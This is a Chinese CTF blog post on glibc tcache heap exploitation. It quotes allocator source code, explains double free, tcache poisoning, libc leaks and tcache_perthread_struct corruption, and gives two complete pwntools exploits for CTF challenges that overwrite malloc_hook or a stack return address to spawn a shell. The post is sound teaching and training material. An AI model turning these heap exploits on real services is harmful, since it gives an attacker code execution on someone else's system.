0%

tcache利用思路总结

tcache bin 相关知识

Tcache机制

Tcache机制是libc2.26开始增加的,tcache bins是64个单链表结构的bins,每个bins最大存放7个对应大小的chunk,chunk的大小在64位中以16字节递增,从24到1032字节,在32位机器上以8字节递增,从12字节到512字节

相关数据结构

这里先以libc2.26的源码来做例子,后面高版本有改动再具体分析

tcache_entry

1
2
3
4
5
6
7
/*in malloc.c 2927*/
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;

tcache_perthread_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*in malloc.c 2932*/
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;

tcache_perthread_struct位于堆开头的位置,大小为0x250,counts数组用于存放每个bin中的chunk数量,entries数组则是用于存放64个bin的地址

tcache_put

1
2
3
4
5
6
7
8
9
10
11
12
/*in malloc.c 2946*/
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

tcache_put函数用于将符合tcache bins条件的chunk放入对应的bin中,从第一句可以看出,放入tcache bin中的chunk与fast bin中不同的是,tcache存放的是chunk的mem,即用户使用的data区域,chunk的fd指针指向的也是mem地址

chunk的插入操作也是采用头插法,每插入一个记录chunk数量的count位+1

tcache_get

1
2
3
4
5
6
7
8
9
10
11
12
13
/*in malloc.c 2958*/
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}

tcache_get函数用于完成tcache bin中chunk的取出,通过源码可以看到和fast bin一样也是从头部开始取,即也是先入后出的链式结构

取出时会将对应bin中的count位减一

与tcache bin相关的利用思路

double free

libc2.29以前

在libc2.29以前是没有对放入tcache bin中的chunk进行double free检查的,也就是说我们可以直接释放两次同一个堆块

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void main(){
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
char* buf = malloc(0x10);
free(buf);
free(buf);
}

jlYQ5q.jpg

同一个堆块被释放进tcache bin中

libc2.29之后

libc2.29之后加入了key字段用于double free的检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/*in malloc.c 2904*/
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread bool tcache_shutting_down = false;
static __thread tcache_perthread_struct *tcache = NULL;

/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

在_int_free()函数中会判断即将释放的堆块是否存在key字段指向tcache的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*in malloc.c 4197*/
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}

tcache poisoning

修改chunk的fd指针达到任意地址读写的目的,比fast bin attack更简单的是,tcache没有size字段的检查,也就是不需要伪造size字段

需要注意的是2.32加入下面宏定义对fd指针机进行异或操作

1
2
3
4
5
6
7
8
9
10
11
12
/* Safe-Linking:
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
tcache->entries[tc_idx] = REVEAL_PTR (e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

tcache_put和tcache_get分别用宏定义对fd进行的加密和解密,所以2.32开始伪造fd的时候需要进行相应的异或操作

leak libc

在2.23下我们可以直接释放一个属于unsorted bin大小的chunk用于泄露libc,有了tcache机制后,想要通过unsorted bin泄露libc的话就需要先填满对应tcache bin,再释放才能进入unsorted bin中,或者直接释放一个0x410大小的chunk(64位下)

tcache perthread corruption

如果可以分配到tcache_perthread_strcut,我们就可以改写所有tcache bin中的count位和对应bin中的地址,填满count位让我们泄露libc变得更轻松,改写对应地址能将任意地址链入链表中到达任意地址读写的目的

例题

VN2020 easyTHeap

libc2.27

程序分析

jAb62j.jpg

jAbjZ6.jpg

free之后指针没有置零,uaf,限制了free次数为3次

jAqZo8.jpg

只能申请7个堆块,最大为0x100

利用思路

  1. double free拿到tcache struct,将所有tcache的count位填满,再free一个unsorted bin大小的堆块即可泄露libc,至此free次数以用完
  2. 编辑tcache改几个链表头打malloc_hook即可

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from pwn import *
banary = "./pwn2"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 27435
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context.log_level = "debug"

def debug():
gdb.attach(io)
pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\x7f")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
ia = lambda : io.interactive()


def add(size):
sla(b'choice: ', b'1')
sla(b'size?', str(size))

def edit(idx, con):
sla(b'choice: ', b'2')
sla(b'idx?', str(idx))
sla(b'content:', con)

def show(idx):
sla(b'choice: ', b'3')
sla(b'idx?', str(idx))

def delete(idx):
sla(b'choice: ', b'4')
sla(b'idx?', str(idx))

add(0x80)

delete(0)
delete(0)

show(0)
heap = u64(io.recv(6).ljust(8, b'\x00')) - 0x10 - 0x250
print(hex(heap))

add(0x80) #1
edit(1, p64(heap + 0x10))
add(0x80) #2
add(0x80) #3 tcache
edit(3, b'a' * 0x40)

add(0x80) #4
delete(0)
show(0)
malloc_hook = uu64() - 96 - 0x10
libcbase = malloc_hook - 0x3EBC30
print(hex(libcbase))
one = libcbase + 0x4f322
realloc = libcbase + 0x98C30
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''

edit(3, b'a' * 0x40 + p64(malloc_hook - 0x13) * 4)
add(0x40) #5
edit(5, b'a' * 11+ p64(one) + p64(realloc + 8))
add(0x30)
ia()

ciscn2022 华东北赛区duck

2.34 uaf , 打environ泄露栈地址,覆盖返回地址为system(“/bin/sh”)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from pwn import *
banary = "./pwn"
libc = ELF("./libc.so.6")
elf = ELF(banary)
ip = '1.14.71.254'
port = 28060
local = 0
if local:
io = process(banary)
else:
io = remote(ip, port)
context.log_level = "debug"

def debug():
gdb.attach(io)
pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\x7f")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
ia = lambda : io.interactive()

def add():
sla(b'Choice: ', b'1')

def delete(idx):
sla(b'Choice: ', b'2')
sla(b'Idx:', str(idx))

def show(idx):
sla(b'Choice: ', b'3')
sla(b'Idx:', str(idx))

def edit(idx, size, con):
sla(b'Choice: ', b'4')
sla(b'Idx:', str(idx))
sla(b'Size:', str(size))
sla(b'Content:', con)

for i in range(9):
add() #8

for i in range(8):
delete(i)

show(0)
ru(b'\n')
key = u64(io.recv(5).ljust(8, b'\x00'))
print(hex(key))
show(7)
ru(b'\n')
libcbase = uu64() - 96 - libc.sym['main_arena']
print(hex(libcbase))
sh = libcbase + 0x1B4689
pop_rdi = libcbase + 0x2daa2
environ = libcbase + libc.sym["environ"]
sys_addr = libcbase + libc.sym['system']

for i in range(5):
add() #13

edit(1, 8, p64(environ ^ key))
add() #14
add() #15 environ
show(15)
stack = uu64() - 0x150 #ret_addr
print(hex(stack))


delete(5)
delete(6)
edit(6, 8, p64(stack - 0x18 ^ key))

add() #16
add() #17 ret_addr
edit(17, 0x30, b'a' * 0x18 + p64(pop_rdi) + p64(sh) + p64(sys_addr))
ia()